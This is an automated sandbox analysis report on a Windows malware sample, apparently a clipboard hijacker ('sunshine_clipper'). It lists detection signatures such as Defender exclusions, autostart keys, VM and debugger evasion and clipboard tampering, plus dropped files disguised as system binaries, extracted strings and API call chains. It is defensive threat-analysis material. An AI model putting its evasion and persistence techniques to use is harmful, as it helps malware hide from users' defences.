Windows Analysis Report
SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe

Overview

General Information

Sample name: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe
Analysis ID: 1543318
MD5: 330709f05491b4e01ddf2af087d4e4f3
SHA1: 0f94e0f3f7ef87df645847f84a94572192f5fc39
SHA256: 3fa9bb2dffef3935ed2795dace89eec65270bd22a71e365ec1f55e0bf301fab5
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Drops large PE files
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Changes image file execution options
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe ReversingLabs: Detection: 21%
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: sunshine_clipper.pdb source: SgrmBroker.exe, 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp, SgrmBroker.exe, 00000018.00000000.2352610812.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: gametoolset.pdb source: SppExtComObj.exe, 00000017.00000000.2292286211.00007FF68609E000.00000002.00000001.01000000.00000008.sdmp, SppExtComObj.exe, 00000017.00000002.2572042733.00007FF68609E000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: sunshine_clipper.pdbHG source: SgrmBroker.exe, 00000018.00000002.2578070189.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp, SgrmBroker.exe, 00000018.00000000.2352610812.00007FF6D9DE9000.00000002.00000001.01000000.00000009.sdmp
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1683814431.00000245B10D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicK
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675392956.00000245B1310000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1725977931.00000245B1212000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2437747374.00000236ACC78000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2404141053.00000236ACC78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675392956.00000245B1310000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1725977931.00000245B1212000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2437747374.00000236ACC78000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2404141053.00000236ACC78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt05
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675087516.00000245B10C3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2410579033.00000236ACB03000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: powershell.exe, 0000000C.00000002.1965404029.000002139A1D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000C.00000002.1965404029.000002139A1D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675392956.00000245B1310000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1725977931.00000245B1212000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675087516.00000245B10C3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2410579033.00000236ACB03000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2437747374.00000236ACC78000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2404141053.00000236ACC78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: powershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675392956.00000245B1310000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1725977931.00000245B1212000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675087516.00000245B10C3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2410579033.00000236ACB03000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2437747374.00000236ACC78000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2404141053.00000236ACC78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1675087516.00000245B10C3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2410579033.00000236ACB03000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: SgrmBroker.exe, 00000018.00000003.2410579033.00000236ACB03000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crl
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.pngXzy
Source: powershell.exe, 0000000C.00000002.1967236251.000002139A336000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.microsoft.c
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000C.00000002.1942235658.00000213821D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzy
Source: powershell.exe, 0000000C.00000002.1967642062.000002139A4FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 0000000C.00000002.1942235658.00000213821D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: SgrmBroker.exe, 00000018.00000003.2404141053.00000236ACC5F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2437747374.00000236ACCAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/news/BreakingNews_72x72.svg
Source: powershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: SppExtComObj.exe, 00000017.00000002.2572042733.00007FF68609E000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://docs.rs/rustls/latest/rustls/manual/_03_howto/index.html#unexpected-eof
Source: SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gameplayapi.intel.com/api/games/downloadthumbnail/
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gameplayapi.intel.com/api/games/downloadthumbnail/.dllY
Source: SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgames2/
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgames2/H
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgames2/P
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1728213124.00000245B11E6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C0000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC28000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACDFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgames2/Y
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgames2/y
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1728213124.00000245B11E6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC28000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACDFE000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgamesettings2/
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgamesettings2/B
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gameplayapi.intel.com/api/games/getagsgamesettings2/j
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000C.00000002.1942235658.00000213823FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/PesterXzy
Source: powershell.exe, 0000000C.00000002.1967642062.000002139A4FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 0000000C.00000002.1959923759.0000021392240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/B
Source: SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/R
Source: SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgames2/
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgames2/Z
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgames2/y
Source: SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C6000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/Q
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1728213124.00000245B11E6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C0000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC28000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACDFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/R
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F8000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC2F000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACE05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/Z
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1729098920.00000245B11F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1728213124.00000245B11E6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1672507572.00000245B12C0000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2436170805.00000236ACC28000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2407016314.00000236ACDFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/u
Contains functionality for read data from the clipboard
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CF1530 OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError,Sleep,OpenClipboard,GetLastError, 24_2_00007FF6D9CF1530
Contains functionality to modify clipboard data
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CFDB59 HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CreateWaitableTimerExW,HeapFree,CreateWaitableTimerExW,HeapFree,HeapFree,WakeByAddressSingle,WakeByAddressSingle,WakeByAddressSingle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,WaitOnAddress,WaitOnAddress,GetLastError,CreateWaitableTimerExW,WakeByAddressSingle,WaitOnAddress,WaitOnAddress,GetLastError,WakeByAddressSingle,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,EmptyClipboard,GetLastError,SetClipboardData,GlobalFree,GetLastError,GetLastError,GlobalFree,GetCurrentThread,ImpersonateAnonymousToken,CloseClipboard,RevertToSelf,WakeByAddressSingle,HeapFree,CreateWaitableTimerExW,GetLastError,AddVectoredExceptionHandler,SetThreadStackGuarantee,GetCurrentThread,SetThreadDescription,SetThreadDescription, 24_2_00007FF6D9CFDB59
Contains functionality to read the clipboard data
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CFBF68 GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcess,NtQueryInformationProcess,HeapReAlloc,HeapFree,CreateMutexW,CreateMutexExW,GetLastError,HeapFree,CloseHandle,HeapFree,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,CloseHandle,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,HeapFree,CreateWaitableTimerExW,Sleep,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,GetCurrentThread,ImpersonateAnonymousToken,CloseClipboard,CreateWaitableTimerExW,RevertToSelf,HeapFree,CreateWaitableTimerExW,SetWaitableTimer,WaitForSingleObject,CloseHandle,HeapFree,AddVectoredExceptionHandler,SetThreadStackGuarantee,GetCurrentThread,SetThreadDescription,SetThreadDescription,HeapFree, 24_2_00007FF6D9CFBF68

System Summary
barindex
Drops large PE files
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe File dump: SppExtComObj.exe.5.dr 706740224 Jump to dropped file
Contains functionality to call native functions
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DCDA50 GetProcessTimes,GetLastError,GetSystemTimes,GetLastError,GetProcessIoCounters,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,GetLastError,GetLastError,CloseHandle,GetLastError,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,HeapFree,HeapFree,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,GetLastError,K32GetModuleFileNameExW,HeapFree,HeapFree,HeapFree,GetLastError,CloseHandle,HeapFree,ReadProcessMemory,HeapFree,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,VirtualQueryEx,ReadProcessMemory,HeapFree,HeapFree,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,ReadProcessMemory,HeapFree,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,RtlFreeHeap,HeapFree,HeapFree,HeapFree,VirtualQueryEx,HeapFree,HeapFree,HeapFree,RtlFreeHeap,ReadProcessMemory,HeapFree,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree, 24_2_00007FF6D9DCDA50
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DCF390 NtQueryInformationProcess,GetErrorInfo,NtQueryInformationProcess,HeapFree,HeapFree, 24_2_00007FF6D9DCF390
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CFBF68 GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcess,NtQueryInformationProcess,GetCurrentProcess,NtQueryInformationProcess,HeapReAlloc,HeapFree,CreateMutexW,CreateMutexExW,GetLastError,HeapFree,CloseHandle,HeapFree,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,CloseHandle,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,HeapFree,CreateWaitableTimerExW,Sleep,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,GetCurrentThread,ImpersonateAnonymousToken,CloseClipboard,CreateWaitableTimerExW,RevertToSelf,HeapFree,CreateWaitableTimerExW,SetWaitableTimer,WaitForSingleObject,CloseHandle,HeapFree,AddVectoredExceptionHandler,SetThreadStackGuarantee,GetCurrentThread,SetThreadDescription,SetThreadDescription,HeapFree, 24_2_00007FF6D9CFBF68
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CFBF68 